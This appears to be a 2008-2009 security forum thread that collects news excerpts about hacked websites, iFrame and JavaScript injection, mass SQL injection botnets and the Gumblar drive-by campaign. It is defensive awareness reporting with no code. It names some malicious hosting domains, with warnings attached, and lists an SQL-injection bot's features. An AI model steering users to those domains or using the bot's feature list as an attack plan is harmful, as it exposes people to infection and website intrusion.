111 replies to this topic

[AplusWebMaster]

FYI...

CBS website iFrame hack
- http://www.infoworld...ame_hack_1.html
December 01, 2008 - "TV network CBS has become the latest big name to have it website used to host malware, a security company has reported. It appears that Russian malware distributors were able to launch another iFrame attack on a sub-domain of the cbs.com site so that it was serving remote malware to any visitors. A user's vulnerability to the malware attack launched by the site hack would depend on a number of factors, including the type of security used on a PC, the operating system, and possibly the browser version... Finjan had informed CBS of the issue, but that the Russian exploit server had in any case been taken offline, neutering the attack for the time being..."

[AplusWebMaster]

FYI...

Mass Injection on John Sands Greeting Card Company site
- http://securitylabs....lerts/3268.aspx
12.23.2008 - "Websense... has discovered that the Web site of John Sands Greeting Card Company is infected with a mass JavaScript injection that delivers a malicious payload. Multiple pages on the site has been found to contain the said malicious code... Acquired by American Greetings in 1996, the company was founded in 1837 by John Sands, the son of an English engraver. The company is Australia's second oldest registered company. In an effort to protect their visitors, Websense Security Labs has contacted John Sands Greeting Card Company and advised them on this incident..."

(Screenshot available at the Websense URL above.)

[AplusWebMaster]

FYI...

Multiple Chinese sites compromised...
- http://securitylabs....ent/alerts.aspx
12.31.2008 - Chinese Government Affairs Information Site Compromised...
12.29.2008 - Download Site of China.com Compromised - Malicious Web Site / Malicious Code
12.26.2008 - Sohu Web Site in China Compromised - Malicious Web Site / Malicious Code...

Edited by AplusWebMaster, 31 December 2008 - 01:43 PM.

[AplusWebMaster]

FYI...

Paris Hilton website infected with malware
- http://www.informati...cleID=212800229
January 12, 2009 - "Once again, hackers have targeted technology associated with Paris Hilton. This time it's her Web site, ParisHilton .com. Security researchers at ScanSafe report that anyone visiting Hilton's site risks infection with malware. "Hilton's popular website, ParisHilton .com, has been outfitted with malware prompting site visitors to 'update' their system in order to continue navigating the site" ScanSafe said in an e-mail. "When the bogus pop-up box appears, users have the option to click 'Cancel' or 'OK.' Regardless of which option they choose, destructive malware will be downloaded to the user's computer"... ScanSafe says the malware has been detected on some 15,000 other Web sites. The company says it found a similar threat, a malicious ad, on Major League Baseball's MLB.com last week. Paris Hilton's site is currently compromised," said Mary Landesman, senior security researcher at ScanSafe, in a phone interview. "We first encountered it on [Jan. 9]. We don't know when it happened." According to Landesman, there's an iFrame that has been embedded in the ParisHilton .com Web site. The iFrame calls out to a site hosting the malware, you69tube .com. It downloads a malicious PDF and attempts to force users into clicking and launching the PDF, which attempts to activate an exploit. Because the malware tries to download additional files whether one clicks "Cancel" or "OK," Landesman says that only a hard quit - CTRL+ALT+Delete - of one's browser provides a way out..."

- http://www.f-secure....s/00001581.html
January 15, 2009 - "... The offending IFrame appears to have been removed at this time... The infection of "Paris Hilton" highlights a popular trend among online attackers..."

Edited by AplusWebMaster, 15 January 2009 - 09:25 AM.

[AplusWebMaster]

FYI...

"Warning: We strongly suggest that readers NOT visit websites mentioned as being behind the attacks discussed. They should be considered dangerous and capable of infecting your system... list of domains used in the mass SQL injections that insert malicious javascript into websites..."

Full list of Injected Sites
- http://www.shadowser...ql-inj-list.txt
Last Updated: 01/23/09 09:12:21 -0700

Edited by AplusWebMaster, 27 January 2009 - 05:26 AM.

[AplusWebMaster]

FYI...

IEC website compromised
- http://securitylabs....lerts/3289.aspx
01.27.2009 - "Websense... has discovered that a subdomain of the International Electrotechnical Commission (IEC) Web site has been compromised. The IEC is an international standards organization that prepares and publishes International Standards for all electrical, electronic, and related technologies... The infected subdomain belongs to the TC26 group. Unprotected users would be subjected to execution of obfuscated Javascript that -redirects- to an exploit site, hosting exploits for Internet Explorer, QuickTime and AOL SuperBuddy. Successful execution of the exploit code incurs a drive-by download. This installs a backdoor on the compromised machine. Major antivirus vendors are -not- detecting this payload..."

(Screenshots available at the URL above.)

[AplusWebMaster]

FYI...

- http://www.pcmag.com...,2339712,00.asp
01.27.09 Larry Seltzer - "...AVG has released research that indicates the number and volatility of web sites serving malicious code is increasing dramatically... Almost 60% of these sites are up for less than one day. The goal of these techniques seems to be to defeat blacklist-based protections. AVG calls them transient threats. What are these web pages? Few are actually put up to serve malware. Some of them are blog comments, some are advertisements, many are legitimate web sites corrupted through HTML/script injection, and many have been corrupted through compromises of SQL servers through SQL injection. These compromised web sites are tricked into redirecting users to the few sites that directly serve the malware. The combination of the Apache web server and PHP scripting engine are a favorite target of attackers. There are large numbers of vulnerabilities for attackers to exploit and no automated patch system to make sure servers are protected... The actual malware being served varies from fake codecs, game password-stealing attacks to fake anti-spyware. The fake codec sites are the most volatile, with 62% active for less than a day. The fake anti-spyware sites are more stable, but 28% are active less than a day and the average is less than 2 weeks..."

[AplusWebMaster]

FYI... (It appears the hacks have been busy - CYA)

"Warning: We strongly suggest that readers NOT visit websites mentioned as being behind the attacks discussed. They should be considered dangerous and capable of infecting your system... list of domains used in the mass SQL injections that insert malicious javascript into websites..."

Full list of Injected Sites
- http://www.shadowser...ql-inj-list.txt
Last Updated: 01/29/09 14:02:09 -0700

[AplusWebMaster]

FYI...

- http://www-935.ibm.c...?cntxt=a1030786
02 Feb 2009 - "... Web sites have become the Achilles'heel for corporate IT security. Attackers are intensely focused on attacking Web applications so they can infect end-user machines. Meanwhile, corporations are using off-the-shelf applications that are riddled with vulnerabilities; or even worse, custom applications that can host numerous unknown vulnerabilities that can't be patched. Last year more than half of all vulnerabilities disclosed were related to Web applications, and of these, more than 74 percent had no patch. Thus, the large-scale, automated SQL injection vulnerabilities that emerged in early 2008 have continued unabated. By the end of 2008, the volume of attacks jumped to 30 times the number of attacks initially seen this summer...
Although attackers continue to focus on the browser and ActiveX controls as a way to compromise end-user machines, they are turning their focus to incorporate new types of exploits that link to malicious movies (for example, Flash) and documents (for example, PDFs). In the fourth quarter of 2008 alone, IBM X-Force traced more than a 50 percent increase in the number of malicious URLs hosting exploits than were found in all of 2007. Even spammers are turning to known Web sites for expanded reach. The technique of hosting spam messages on popular blogs and news-related websites more than doubled in the second half of this year..."

[AplusWebMaster]

FYI...

Kaspersky USA site hacked...
- http://www.theregist...promise_report/
8 February 2009 - "A security lapse at Kaspersky has exposed a wealth of proprietary information about the anti-virus provider's products and customers, according to a blogger*, who posted screen shots and other details that appeared to substantiate the claims. In a posting made Saturday, the hacker claimed a simple SQL injection gave access to a database containing "users, activation codes, lists of bugs, admins, shop, etc." Kaspersky has declined to comment... The Register will be updating this story as warranted..."
* http://hackersblog.o...-sql-injection/

[AplusWebMaster]

FYI...

500,000 Websites Hit By New Form Of SQL Injection In '08
- http://www.darkreadi...cleID=214600046
Feb. 25, 2009 - "...An automated form of SQL injection using botnets emerged as the popular method of hacking Websites, according to a newly released report from the Web Hacking Incidents Database (WHID), an annual report by Breach Security and overseen by the Web Application Security Consortium (WASC). The report also found that attackers increasingly are targeting a Website's customers rather than the sensitive information in the site's database... Mass SQL Injection Bot attacks basically automate the infection process; the Nihaorr1 and Asprox botnets both deployed this method last year, according to the report... Government, security, and law enforcement organizations represented the biggest sector suffering from these attacks (32 percent), but that may, in part, be due to their more stringent disclosure rules, the report says. Next were information services (13 percent), finance (11 percent), retail (11 percent), Internet (9 percent), and education (6 percent)..."
* http://www.breach.co...s/2008WHID.html

Edited by AplusWebMaster, 27 February 2009 - 10:55 AM.

[AplusWebMaster]

FYI...

DNS redirect attack - Puerto Rico
- http://news.cnet.com...0228436-83.html
April 27, 2009 - "... A group calling itself the "Peace Crew" claimed that they used a SQL injection attack to break into the Puerto Rico registrar's management system... While the sites that visitors were -redirected- to were obviously not the legitimate sites, DNS redirects could be used to send unsuspecting Web surfers to phishing sites pretending to be banks where they would be prompted to provide sensitive information. People should use the SSL (Secure Sockets Layer) protocol for encrypting communications with sensitive sites and use anti-phishing technology in the browser that colors part of the URL address bar green or red based on the safety level of the site being visited..."

(Screenshot available at the URL above.)

[AplusWebMaster]

FYI...

SQL injections through Search Engine reconnaissance...
- http://ddanchev.blog...ugh-search.html
April 29, 2009 - "From the lone Chinese SQL injectors empowered with point'n'click tools for massive SQL injection attacks, to the much more efficient and automated botnet approach courtesy of, for instance, the ASProx botnet. The process of automatically fetching URLs from public search engines in order to build hit lists for verifying against remote file inclusion attacks and potential SQL injections, remains a commodity feature in a great number of newly released malware bots... A recently released malware bot is once again empowering the average script kiddie with the possibility to take advantage of the window of opportunity for each and every remotely exploitable web application flaw... Moreover, the IRC based bot is also featuring a console which allows manual exploitation or intelligence gathering for a particular site. Some of the features include:
- Remote file inclusion
- Local file inclusion checks ()
- MySQL database details
- Extract all database names
- Data dumping from column and table
- Notification issued when Google bans the infected host for automatically using it
... The window of opportunity for abusing a partcular web application flaw is abused much more efficiently due to the fact that reconnaissance data about its potential exploitability is already crawled by a public search engine - often in real time. The concept, as well as the features within the bot are not rocket science - that's what makes it so easy to use."

[AplusWebMaster]

FYI...

- http://preview.tinyurl.com/rbxxwa
May 14, 2009 PC World - "A new round of website hijacks is attempting to install malicious, Google-focused software on unpatched PCs, according to security company ScanSafe, further cementing the drive-by-download approach as a bad-guy tactic of choice. The attack, dubbed "Gumblar" by ScanSafe*, starts by hijacking legitimate sites and inserting attack code. The more than 1,500 hacked sites, including Tennis.com and Variety.com, don't represent an especially huge number, but it's growing rapidly. Since last week, the attack has grown by 80 percent, according to the company, and has spiked 188 percent since yesterday.
The inserted attack code attempts to identify old, unpatched vulnerabilities on a victim PC that browses a hacked site, and will take advantage of any discovered hole to install malware. These kinds of drive-by-download attacks are sneaky and dangerous, but the good news is that while the actual exploits used vary as time passes, the company says none have yet gone after zero-day holes that don't yet have a fix available. The attack code has largely gone after PDF and Flash flaws discovered in the last year..."
* http://blog.scansafe...gumblar-qa.html

- http://www.theregist..._web_infection/
14 May 2009 - "... The exploit code is unique for every website, making it impossible to identify a compromised site until someone has accidentally surfed there. It uses obfuscated Javascript that's burrowed deep into a website's source code to exploit unpatched vulnerabilities in a visitor's Adobe Flash and Reader programs. Victims then join a botnet that manipulates their Google search results... By injecting ads and links into certain searches, infected users see results that are different than they would otherwise be..."

- http://www.darkreadi...cleID=217500218
May 14, 2009 - "... difficult to find and bring down... its source IP addresses have been traced to Latvia and Russia, and its servers are located in the U.K..."

Gumblar .cn exploit
- http://preview.tinyurl.com/r5cplm
07 May 09 (Unmask Parasites blog)

More Facts about the Gumblar attack
- http://preview.tinyurl.com/qg5c8d
15 May 09 (Unmask Parasites blog)

Troj/JSRedir-R attacks
- http://www.sophos.co...abs/v/post/4422
May 14, 2009

• http://google.com/sa...ite=gumblar.cn/
"... Malicious software includes 24 scripting exploit(s), 6 trojan(s)... site has hosted malicious software over the past 90 days. It infected 12799 domain(s)..."

Edited by AplusWebMaster, 18 May 2009 - 07:49 AM.
Added Dark Reading and Google diag link...

[AplusWebMaster]

More...

- http://isc.sans.org/...ml?storyid=6403
Last Updated: 2009-05-18 17:54:18 UTC - "... Gumblar/JSRedir-R drive-bys. Although this malware has been around for a while, several A/V vendors and some relatively mainstream news outlets have recently reported a large increase in websites injected with JSRedir-R/Gumblar. According to Sophos* this malware accounted for approximately 42% of all infected websites detected in the last week, nearly 6 times its closest rival. Although the infection method is not clear, given the variety of servers and platforms, it is most likely weak login credentials..."
* http://www.sophos.co...ware-threat-web
May 14, 2009